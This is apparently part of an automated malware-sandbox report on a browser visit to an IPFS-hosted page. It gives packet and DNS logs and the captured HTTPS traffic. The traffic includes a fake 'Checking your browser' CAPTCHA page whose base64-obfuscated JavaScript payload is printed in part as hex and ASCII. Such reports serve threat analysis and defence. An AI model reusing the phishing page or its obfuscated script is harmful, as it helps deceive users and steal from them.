Apr 26, 2024 10:59:50.898238897 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.898344040 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.901861906 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.901870966 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.902215004 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.904979944 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.952116013 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:51.147793055 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:51.147871971 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:51.147977114 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:51.148963928 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:51.149010897 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:51.149044037 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:51.149060011 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:58.493015051 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:58.493086100 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:58.493215084 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:59.615410089 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:59.615462065 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:00.496685982 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 26, 2024 11:00:00.496872902 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 26, 2024 11:00:00.497313976 CEST	49725	443	192.168.2.5	23.1.237.91
Apr 26, 2024 11:00:00.497345924 CEST	443	49725	23.1.237.91	192.168.2.5
Apr 26, 2024 11:00:00.497661114 CEST	49725	443	192.168.2.5	23.1.237.91
Apr 26, 2024 11:00:00.498034000 CEST	49725	443	192.168.2.5	23.1.237.91
Apr 26, 2024 11:00:00.498047113 CEST	443	49725	23.1.237.91	192.168.2.5
Apr 26, 2024 11:00:00.683067083 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 26, 2024 11:00:00.683103085 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 26, 2024 11:00:00.899418116 CEST	443	49725	23.1.237.91	192.168.2.5
Apr 26, 2024 11:00:00.899502993 CEST	49725	443	192.168.2.5	23.1.237.91
Apr 26, 2024 11:00:02.673157930 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 11:00:02.673310995 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 11:00:02.673365116 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 11:00:03.250713110 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 11:00:03.250751972 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 11:00:20.078217983 CEST	443	49725	23.1.237.91	192.168.2.5
Apr 26, 2024 11:00:20.078316927 CEST	49725	443	192.168.2.5	23.1.237.91
Apr 26, 2024 11:00:48.113668919 CEST	49730	443	192.168.2.5	192.178.50.36
Apr 26, 2024 11:00:48.113745928 CEST	443	49730	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:48.113924980 CEST	49730	443	192.168.2.5	192.178.50.36
Apr 26, 2024 11:00:48.116564989 CEST	49730	443	192.168.2.5	192.178.50.36
Apr 26, 2024 11:00:48.116602898 CEST	443	49730	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:48.506247044 CEST	443	49730	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:48.506674051 CEST	49730	443	192.168.2.5	192.178.50.36
Apr 26, 2024 11:00:48.506711006 CEST	443	49730	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:48.507826090 CEST	443	49730	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:48.512551069 CEST	49730	443	192.168.2.5	192.178.50.36
Apr 26, 2024 11:00:48.512645006 CEST	443	49730	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:48.564577103 CEST	49730	443	192.168.2.5	192.178.50.36
Apr 26, 2024 11:00:58.521357059 CEST	443	49730	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:58.521425962 CEST	443	49730	192.178.50.36	192.168.2.5
Apr 26, 2024 11:00:58.521509886 CEST	49730	443	192.168.2.5	192.178.50.36
Apr 26, 2024 11:00:59.610686064 CEST	49730	443	192.168.2.5	192.178.50.36
Apr 26, 2024 11:00:59.610722065 CEST	443	49730	192.178.50.36	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 10:59:44.362756968 CEST	53	56094	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:44.635621071 CEST	53	57779	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:45.683600903 CEST	53	51470	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:47.291609049 CEST	52821	53	192.168.2.5	1.1.1.1
Apr 26, 2024 10:59:47.291769028 CEST	50313	53	192.168.2.5	1.1.1.1
Apr 26, 2024 10:59:47.418011904 CEST	53	52821	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:47.418438911 CEST	53	50313	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:48.046565056 CEST	61263	53	192.168.2.5	1.1.1.1
Apr 26, 2024 10:59:48.046761990 CEST	62219	53	192.168.2.5	1.1.1.1
Apr 26, 2024 10:59:48.171555042 CEST	53	61263	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:48.171757936 CEST	53	62219	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:48.217623949 CEST	53	58364	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:49.206866026 CEST	53	58689	1.1.1.1	192.168.2.5
Apr 26, 2024 10:59:50.099607944 CEST	53	62603	1.1.1.1	192.168.2.5
Apr 26, 2024 11:00:03.376542091 CEST	53	62210	1.1.1.1	192.168.2.5
Apr 26, 2024 11:00:22.158967972 CEST	53	54130	1.1.1.1	192.168.2.5
Apr 26, 2024 11:00:43.865118980 CEST	53	57676	1.1.1.1	192.168.2.5
Apr 26, 2024 11:00:45.007841110 CEST	53	55452	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 10:59:47.291609049 CEST	192.168.2.5	1.1.1.1	0xe652	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:59:47.291769028 CEST	192.168.2.5	1.1.1.1	0xc71f	Standard query (0)	ipfs.io	65	IN (0x0001)	false
Apr 26, 2024 10:59:48.046565056 CEST	192.168.2.5	1.1.1.1	0x5911	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:59:48.046761990 CEST	192.168.2.5	1.1.1.1	0x3c94	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 10:59:47.418011904 CEST	1.1.1.1	192.168.2.5	0xe652	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:59:47.418438911 CEST	1.1.1.1	192.168.2.5	0xc71f	No error (0)	ipfs.io			65	IN (0x0001)	false
Apr 26, 2024 10:59:48.171555042 CEST	1.1.1.1	192.168.2.5	0x5911	No error (0)	www.google.com		192.178.50.36	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:59:48.171757936 CEST	1.1.1.1	192.168.2.5	0x3c94	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 26, 2024 11:00:00.198550940 CEST	1.1.1.1	192.168.2.5	0x643b	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 11:00:00.198550940 CEST	1.1.1.1	192.168.2.5	0x643b	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:00:13.454015017 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 11:00:13.454015017 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:00:37.251137018 CEST	1.1.1.1	192.168.2.5	0x40df	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 11:00:37.251137018 CEST	1.1.1.1	192.168.2.5	0x40df	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:00:57.107304096 CEST	1.1.1.1	192.168.2.5	0x26ac	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 11:00:57.107304096 CEST	1.1.1.1	192.168.2.5	0x26ac	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipfs.io

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	209.94.90.1	443	1412	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 08:59:47 UTC	701	OUT	GET /ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN HTTP/1.1 Host: ipfs.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 08:59:48 UTC	1033	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 08:59:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: Content-Type access-control-allow-headers: Range access-control-allow-headers: User-Agent access-control-allow-headers: X-Requested-With access-control-allow-methods: GET access-control-allow-methods: HEAD access-control-allow-methods: OPTIONS access-control-allow-origin: * access-control-expose-headers: Content-Length access-control-expose-headers: Content-Range access-control-expose-headers: X-Chunked-Output access-control-expose-headers: X-Ipfs-Path access-control-expose-headers: X-Ipfs-Roots access-control-expose-headers: X-Stream-Output Cache-Control: public, max-age=29030400, immutable x-ipfs-path: /ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN x-ipfs-roots: QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN x-ipfs-pop: rainbow-dc13-07 CF-Cache-Status: MISS Server: cloudflare CF-RAY: 87a560f86fb27bf9-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 08:59:48 UTC	336	IN	Data Raw: 32 32 31 62 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d Data Ascii: 221b<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=Edge"/> <meta name="viewport" content="width=device-
2024-04-26 08:59:48 UTC	1369	IN	Data Raw: 68 69 76 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 23 64 6d 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 38 30 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 33 35 70 78 3b 7d 73 70 61 6e 2e 63 74 70 2d 6c 61 62 65 6c 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 68 61 6c 6c 65 6e 67 65 2d 69 74 65 6d 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2a 2c 3a 3a 61 66 74 65 72 2c 3a 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 Data Ascii: hive"> <title>Just a moment...</title> <style> #dm{font-weight:800; font-size:35px;}span.ctp-label{padding-left:5px}.challenge-container,.challenge-item{align-items:center;display:flex}*,::after,::before{box-sizing:border-box;margin:0;padd
2024-04-26 08:59:48 UTC	1369	IN	Data Raw: 74 3a 32 38 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 76 65 72 69 66 79 69 6e 67 20 73 76 67 2c 2e 73 75 63 63 65 73 73 2d 69 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 77 69 64 74 68 3a 33 30 70 78 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 6d 61 72 6b 2c 69 6e 70 75 74 3a 64 69 73 61 62 6c 65 64 7e 2e 6d 61 72 6b 2c 69 6e 70 75 74 3a 66 6f 63 75 73 7e 2e 6d 61 72 6b 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 33 38 31 32 37 7d 2e 70 31 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 66 66 66 7d 2e 73 75 63 63 65 73 73 2d 69 63 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 Data Ascii: t:28px}.challenge-verifying svg,.success-icon{display:flex;margin-right:8px;width:30px;height:30px}input:checked~.mark,input:disabled~.mark,input:focus~.mark{border-color:#038127}.p1{fill:none;stroke:#fff}.success-icon{border-radius:50%;box-shadow:inset 0
2024-04-26 08:59:48 UTC	1369	IN	Data Raw: 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 35 30 70 78 29 7b 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 34 35 30 70 78 29 7b 6d 61 69 6e 7b 6d 61 72 67 69 6e 3a 35 72 65 6d 20 61 75 74 6f 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 72 65 6d 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 33 35 30 70 78 29 7b 2e 63 68 61 6c 6c 65 6e 67 65 2d 62 72 61 6e 64 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 0a 20 Data Ascii: 0%{transform:scale(1)}}@media (max-width:750px){h1{font-size:2.25rem}h2{font-size:1.25rem}}@media (max-width:450px){main{margin:5rem auto}h1{font-size:2rem}h2{font-size:1.1rem}p{font-size:1rem}}@media (max-width:350px){.challenge-branding{display:none}}
2024-04-26 08:59:48 UTC	1369	IN	Data Raw: 57 30 75 59 58 5a 68 61 57 78 77 63 6d 39 71 5a 57 4e 30 4c 6d 39 79 5a 77 3d 3d 22 29 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 61 63 63 65 73 73 69 6e 67 3c 2f 68 32 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 65 63 61 70 74 63 68 61 2d 63 68 65 63 6b 62 6f 78 20 67 6f 6f 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 72 65 63 61 70 74 63 68 61 2d 63 68 65 63 6b 62 6f 78 2d 75 6e 63 68 65 63 6b 65 64 20 72 63 2d 61 6e 63 68 6f 72 2d 63 68 65 63 6b 62 6f 78 22 20 72 6f 6c 65 3d 22 63 68 65 63 6b 62 6f 78 22 20 61 72 69 61 2d 63 68 65 63 6b 65 64 3d 22 66 61 6c 73 65 22 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 2d 61 6e 63 68 Data Ascii: W0uYXZhaWxwcm9qZWN0Lm9yZw=="))</script></h1> <h2>Checking your browser before accessing</h2> <span class="recaptcha-checkbox goog-inline-block recaptcha-checkbox-unchecked rc-anchor-checkbox" role="checkbox" aria-checked="false" id="recaptcha-anch
2024-04-26 08:59:48 UTC	1369	IN	Data Raw: 34 2e 35 34 35 39 22 20 79 31 3d 22 32 34 2e 35 34 36 22 20 79 32 3d 22 32 39 2e 35 34 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 72 6f 74 61 74 65 28 31 33 35 20 32 34 2e 35 34 35 39 20 32 34 2e 35 34 36 29 22 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 3c 2f 6c 69 6e 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 78 31 3d 22 31 35 22 20 78 32 3d 22 31 35 22 20 79 31 3d 22 32 38 2e 35 22 20 79 32 3d 22 33 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 72 6f 74 61 74 65 28 31 38 30 20 31 35 20 32 38 2e 35 29 22 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 3c 2f 6c 69 6e 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 78 31 3d 22 35 2e 34 35 34 31 Data Ascii: 4.5459" y1="24.546" y2="29.546" transform="rotate(135 24.5459 24.546)" class="circle"></line> <line x1="15" x2="15" y1="28.5" y2="33.5" transform="rotate(180 15 28.5)" class="circle"></line> <line x1="5.4541
2024-04-26 08:59:48 UTC	1369	IN	Data Raw: 3d 22 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 22 20 63 78 3d 22 32 36 22 20 63 79 3d 22 32 36 22 20 72 3d 22 32 35 22 3e 3c 2f 63 69 72 63 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 70 31 22 20 64 3d 22 6d 31 33 2c 32 36 6c 39 2e 33 37 2c 39 6c 31 37 2e 36 33 2c 2d 31 38 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 6c 61 62 65 6c 22 3e 53 75 63 63 65 73 73 21 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ="success-circle" cx="26" cy="26" r="25"></circle> <path class="p1" d="m13,26l9.37,9l17.63,-18"></path> </svg> <span class="challenge-label">Success!</span> </div>
2024-04-26 08:59:48 UTC	189	IN	Data Raw: 37 31 35 37 62 63 39 35 33 33 37 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 75 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 4e 57 59 77 59 6a 4d 31 4d 47 45 74 5a 6d 59 31 4d 43 30 30 4f 44 55 35 4c 57 46 6b 5a 54 41 74 4f 54 64 6b 5a 54 51 7a 4d 32 56 6c 4e 47 4a 6a 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 67 6d 76 70 70 71 73 68 61 79 77 64 7a 71 6d 77 73 3c 2f 64 69 76 3e 0a 3c 2f 6d 61 69 6e 3e 0a 0a 3c 2f 62 6f 64 79 3e 0d 0a Data Ascii: 7157bc95337</span></p> <div id="ru" style="display:none">NWYwYjM1MGEtZmY1MC00ODU5LWFkZTAtOTdkZTQzM2VlNGJj</div> <div style="display:none">gmvppqshaywdzqmws</div></main></body>
2024-04-26 08:59:48 UTC	1369	IN	Data Raw: 37 66 66 39 0d 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 46 38 77 65 44 55 33 5a 6d 45 33 59 69 78 66 4d 48 67 79 4e 57 52 6b 4d 47 51 70 65 32 5a 31 62 6d 4e 30 61 57 39 75 49 46 38 77 65 44 45 33 4e 6a 51 30 4e 79 68 66 4d 48 67 31 4d 6a 51 30 4d 6a 63 73 58 7a 42 34 4e 47 52 68 59 54 45 79 4c 46 38 77 65 44 4e 69 4d 57 52 69 59 69 78 66 4d 48 67 30 4d 7a 51 77 4e 6a 45 73 58 7a 42 34 4e 47 4d 32 4e 7a 4a 6c 4b 58 74 79 5a 58 52 31 63 6d 34 67 58 7a 42 34 4d 7a 6b 30 4f 53 68 66 4d 48 67 30 5a 47 46 68 4d 54 49 74 49 43 30 77 65 44 46 6d 4e 79 78 66 4d 48 67 31 Data Ascii: 7ff9<script type="text/javascript" src="data:text/javascript;base64,KGZ1bmN0aW9uKF8weDU3ZmE3YixfMHgyNWRkMGQpe2Z1bmN0aW9uIF8weDE3NjQ0NyhfMHg1MjQ0MjcsXzB4NGRhYTEyLF8weDNiMWRiYixfMHg0MzQwNjEsXzB4NGM2NzJlKXtyZXR1cm4gXzB4Mzk0OShfMHg0ZGFhMTItIC0weDFmNyxfMHg1
2024-04-26 08:59:48 UTC	1369	IN	Data Raw: 67 78 4e 79 6f 77 65 44 4a 6b 59 69 6b 72 4c 58 42 68 63 6e 4e 6c 53 57 35 30 4b 46 38 77 65 44 51 78 5a 47 51 31 4d 53 67 77 65 44 67 35 4c 44 42 34 4d 54 56 6a 4c 44 42 34 4d 54 45 79 4c 44 42 34 4d 6a 45 79 4c 43 30 77 65 44 51 70 4b 53 38 6f 4c 54 42 34 4d 6a 42 6b 4d 53 6f 77 65 44 45 72 4d 48 67 78 4e 6d 45 35 4b 7a 42 34 4e 53 6f 77 65 44 49 77 4f 53 6b 72 63 47 46 79 63 32 56 4a 62 6e 51 6f 58 7a 42 34 4e 54 55 30 4e 6d 45 30 4b 44 42 34 4d 57 55 73 4c 54 42 34 4f 44 6b 73 4c 54 42 34 4e 7a 63 73 4c 54 42 34 4f 47 4d 73 4c 54 42 34 4d 54 6b 78 4b 53 6b 76 4b 43 30 77 65 44 46 6c 4d 79 73 77 65 44 4d 77 5a 53 6f 77 65 44 45 72 4d 48 67 78 4b 69 30 77 65 44 45 79 4e 53 6b 72 4c 58 42 68 63 6e 4e 6c 53 57 35 30 4b 46 38 77 65 44 4d 33 4e 6d 5a 6d 59 Data Ascii: gxNyoweDJkYikrLXBhcnNlSW50KF8weDQxZGQ1MSgweDg5LDB4MTVjLDB4MTEyLDB4MjEyLC0weDQpKS8oLTB4MjBkMSoweDErMHgxNmE5KzB4NSoweDIwOSkrcGFyc2VJbnQoXzB4NTU0NmE0KDB4MWUsLTB4ODksLTB4NzcsLTB4OGMsLTB4MTkxKSkvKC0weDFlMysweDMwZSoweDErMHgxKi0weDEyNSkrLXBhcnNlSW50KF8weDM3NmZmY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49716	23.193.120.112	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 08:59:50 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 08:59:50 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0712) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=79482 Date: Fri, 26 Apr 2024 08:59:50 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	23.193.120.112	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 08:59:50 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 08:59:51 UTC	530	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0DZ+oYgAAAABSxwJpMgMuSLkfS640ajfFQVRBRURHRTEyMTkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=79494 Date: Fri, 26 Apr 2024 08:59:51 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-26 08:59:51 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 6756, Parent PID: 5700

General

Target ID:	0
Start time:	10:59:39
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 1412, Parent PID: 6756

General

Target ID:	2
